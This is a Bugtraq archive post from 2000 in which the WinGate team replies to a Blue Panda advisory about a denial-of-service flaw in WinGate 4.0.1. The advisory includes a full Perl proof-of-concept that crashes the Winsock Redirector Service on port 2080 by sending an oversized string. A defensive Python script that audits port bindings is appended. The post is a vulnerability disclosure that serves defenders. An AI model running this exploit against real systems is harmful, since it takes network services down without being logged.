Bugtraq
mailing list archives
Re: Wingate 4.0.1 denial-of-service
From: Doug Kassuba <dkassuba () I2K NET>
Date: Mon, 2 Oct 2000 18:51:34 -0000
We used your information to analyse this weakness and it was fixed for the next release, which will be the beta version of WinGate 4.1. This is currently available at http://wingate.deerfield.com/beta

For normal use it is not too serious a vulnerability as the Winsock Redirector Service is by default only bound to the local network adaptors and there is no point in binding it to public (internet) adaptors, meaning that the attack would have to be launched from within the LAN. GateKeeper will warn the operator when they bind the Winsock Redirector Service to a public adaptor.

WinGate Development Team
=================================================================
Blue Panda Vulnerability Announcement: Wingate 4.0.1
02/10/2000 (dd/mm/yyyy)
bluepanda () dwarf box sk
http://bluepanda.box.sk/
=================================================================
Details available in attached file.
=================================================================
Blue Panda Vulnerability Announcement: Wingate 4.0.1
02/10/2000 (dd/mm/yyyy)
bluepanda () dwarf box sk
http://bluepanda.box.sk/
=================================================================
Problem: The Wingate engine can be disabled by sending an abnormal string to
the Winsock Redirector Service. The attack is not logged.
Vulnerable: Wingate Home/Standard/Pro 4.0.1, possible prior versions
(untested).
Immune: Wingate 4.1 Beta A
Vendor status: Notified.
===================
Proof of concept:
===================
#!/usr/bin/perl
#
# wgate401.pl - Wingate 4.0.1 denial-of-service
# Blue Panda - bluepanda () dwarf box sk
# http://bluepanda.box.sk/
#
# ----------------------------------------------------------
# Disclaimer: this file is intended as proof of concept, and
# is not intended to be used for illegal purposes. I accept
# no responsibility for damage incurred by the use of it.
# ----------------------------------------------------------
#
# Causes all Wingate services to become unavailable until the Wingate Engine
# is restarted. The Winsock Redirector Service must be enabled in order for
# this to work. Tested on the evaluation version of Wingate Pro 4.0.1.
#
use IO::Socket;
$host = "host.com";
$port = "2080";
$sleepfor = 1;
print "Wingate 4.0.1 denial-of-service
Blue Panda - bluepanda\ () dwarf box sk
http://bluepanda.box.sk/
----------------------------------------------------------
Disclaimer: this file is intended as proof of concept, and
is not intended to be used for illegal purposes. I accept
no responsibility for damage incurred by the use of it.
----------------------------------------------------------
Causes all Wingate services to become unavailable until the Wingate Engine
is restarted. The Winsock Redirector Service must be enabled in order for
this to work.\n\n";
# Connect to the Winsock Redirector Service.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";
# Send some characters to the Winsock Redirector Service.
$buffer = "a" x 1079;
print $socket "$buffer";
# Wait a few seconds.
$counter = 0;
print "Sleeping for $sleepfor seconds.";
while($counter < $sleepfor) {
    sleep(1);
    print ".";
    $counter += 1;
}
print "\n";
# Close the connection. The Winsock Redirector Service should now be
# disabled.
close($socket);
# Connect once more to the Winsock Redirector Service. This will disable all
# other services.
print "Connecting to $host:$port...";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "failed.\n";
print "done.\n";
# Finished.
close($socket);
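
The vendor reply above makes exposure depend on which adaptors the Winsock Redirector Service is bound to, and the advisory notes the attack is not logged, so the binding is worth checking directly. The following is an added example, not part of the original post or of WinGate: it audits `netstat -an` output for TCP listeners on port 2080 (the port the proof of concept connects to) and flags any bound beyond the LAN. The sample output, the function names and the use of RFC 1918 ranges to mean "local" are assumptions.

```python
import ipaddress

WRS_PORT = 2080  # port the proof of concept connects to

# Assumption: "local network adaptor" means an RFC 1918 address.
RFC1918 = [ipaddress.ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample of Windows `netstat -an` output (not from the post).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State
  TCP    192.168.0.1:2080       0.0.0.0:0              LISTENING
  TCP    203.0.113.10:2080      0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING
  TCP    192.168.0.1:2080       192.168.0.23:1049      ESTABLISHED
"""

def classify_bind(addr):
    """Classify a bind address by who can reach a listener on it."""
    ip = ipaddress.ip_address(addr)
    if ip.is_unspecified:
        return "all-interfaces"  # 0.0.0.0 includes any public adaptor
    if ip.is_loopback:
        return "loopback"
    if ip.version == 4 and any(ip in net for net in RFC1918):
        return "lan-only"
    return "public"

def audit_listeners(netstat_text, port=WRS_PORT):
    """Return [(address, exposure)] for each TCP listener on `port`."""
    findings = []
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) < 4 or f[0].upper() != "TCP" or f[3].upper() != "LISTENING":
            continue
        addr, _, local_port = f[1].rpartition(":")
        if local_port != str(port):
            continue
        addr = addr.strip("[]")  # IPv6 listeners are printed as [addr]:port
        findings.append((addr, classify_bind(addr)))
    return findings

def exposed(findings):
    """Listeners reachable from beyond the LAN (the binding the reply warns about)."""
    return [f for f in findings if f[1] in ("public", "all-interfaces")]

if __name__ == "__main__":
    for addr, exposure in audit_listeners(SAMPLE_NETSTAT):
        print(f"{addr}:{WRS_PORT} -> {exposure}")
```

Any entry returned by `exposed()` means the service can be reached from outside the LAN and should be rebound to a local adaptor or filtered at the perimeter.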